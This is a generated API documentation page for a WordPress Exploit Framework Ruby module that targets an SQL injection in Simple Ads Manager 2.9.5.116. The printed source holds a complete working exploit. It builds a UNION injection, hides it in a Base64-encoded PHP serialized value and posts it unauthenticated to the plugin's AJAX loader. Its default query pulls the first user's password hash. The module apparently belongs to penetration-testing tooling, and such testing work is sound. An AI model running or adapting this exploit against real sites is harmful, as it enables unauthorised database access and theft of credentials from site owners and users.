Class: Wpxf::Auxiliary::SimpleAdsManagerSqlInjection

Inherits:
Module
  • Object
show all
Includes:
Wpxf
Defined in:
lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeSimpleAdsManagerSqlInjection

Returns a new instance of SimpleAdsManagerSqlInjection.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 9

def initialize
  super

  update_info(
    name: 'Simple Ads Manager SQL Injection',
    desc: 'This module exploits an SQL injection in version '\
          '2.9.5.116 of the Simple Ads Manager plugin which '\
          'allows unauthenticated users to view a single field of '\
          'data at a time, such as e-mails and passwords.',
    author: [
      'Kacper Szurek', # Vulnerability discovery
      'rastating'      # WPXF module
    ],
    references: [
      ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
      ['WPVDB', '8357']
    ],
    date: 'Dec 30 2015'
  )

  register_options([
    StringOption.new(
      name: 'sql',
      desc: 'The SQL query to execute (maximum of one field selected)',
      default: 'select user_pass from wp_users where ID = 1',
      required: true
    )
  ])
end

Instance Method Details

#checkObject 



64
65
66
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 64

def check
  check_plugin_version_from_readme('simple-ads-manager', '2.9.5.118', '2.9.4.116')
end

#compile_sqliObject 



58
59
60
61
62
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 58

def compile_sqli
  padding = ''
  (1..22).each { |i| padding += ",#{Utility::Text.rand_numeric(rand(1..3))}" }
  sql.gsub(/^(select\s+)(.+)(\s+from.+)/i, ") UNION (\\1\\2#{padding}\\3")
end

#encoded_injectionObject 



72
73
74
75
76
77
78
79
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 72

def encoded_injection
  compiled_sqli = compile_sqli
  emit_info "Compiled SQL: #{compiled_sqli}", true
  serialized = "a:4:{s:2:\"WC\";s:3:\"1=0\";s:3:\"WCT\";s:0:\"\";s"\
               ":3:\"WCW\";s:#{compiled_sqli.bytesize}:\"#{compiled_sqli}\""\
               ";s:4:\"WC2W\";s:0:\"\";}"
  Base64.strict_encode64(serialized)
end

#runObject 



81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 81

def run
  return false unless super

  emit_info 'Validating SQL...'
  unless valid_query?
    emit_error 'Specified query appears to be invalid'
    return false
  end

  emit_info 'Preparing injection...'
  body = {
    'action' => 'load_place',
    'id' => '0',
    'pid' => '1',
    'wc' => encoded_injection
  }

  emit_info 'Executing request...'
  res = execute_post_request(url: vulnerable_url, body: body)

  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200 || res.body.strip.empty?
    emit_info "Response code: #{res.code}", true
    emit_info "Response body: #{res.body}", true
    emit_error 'Failed to execute request'
    return false
  end

  emit_info 'Parsing response...'
  begin
    json = JSON.parse(res.body)
    emit_success "Query result: #{json['pid']}"
  rescue JSON::ParserError
    emit_error 'Could not parse the response'
    return false
  end

  true
end

#sqlObject 



39
40
41
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 39

def sql
  normalized_option_value('sql')
end

#valid_query?Boolean

Returns:

  • (Boolean) 


43
44
45
46
47
48
49
50
51
52
53
54
55
56
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 43

def valid_query?
  match = sql.match(/^select\s+(.+)\s+from.+/i)
  if match.nil?
    emit_error 'Could not determine the field list from the query', true
    return false
  end

  if match[1].include?(',') || match[1].include?('*')
    emit_warning 'More than one field appears to have been selected. This '\
                 'can cause the query to silently fail and return no data'
  end

  true
end

#vulnerable_urlObject 



68
69
70
 
# File 'lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb', line 68

def vulnerable_url
  normalize_uri(wordpress_url_plugins, 'simple-ads-manager', 'sam-ajax-loader.php')
end